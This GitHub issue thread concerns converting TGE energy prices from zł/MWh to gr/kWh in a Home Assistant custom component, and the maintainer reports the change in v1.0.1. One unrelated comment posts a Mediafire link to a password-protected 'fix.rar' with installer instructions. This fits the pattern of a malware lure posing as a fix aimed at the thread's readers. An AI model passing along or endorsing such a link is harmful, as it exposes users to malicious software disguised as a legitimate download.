### ISSUE TITLE
Recaltulate prices: zł/MWh to gr/kWh

### ISSUE THREAD

**Issue by KrzysztofHajdamowicz** [PiotrMachowski/Home-Assistant-custom-components-TGE#2]
Residential users are charged in gr/kWh, so let's provide more natural to them unit of measurement.

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jordan87** [comment]
Wyglada na to ze przynajmniej zakladka Energia rozroznia jednostki i prawidlowo przelicza stawki z MWh na kWh

**Comment by PiotrMachowski** [comment]
Added in v1.0.1
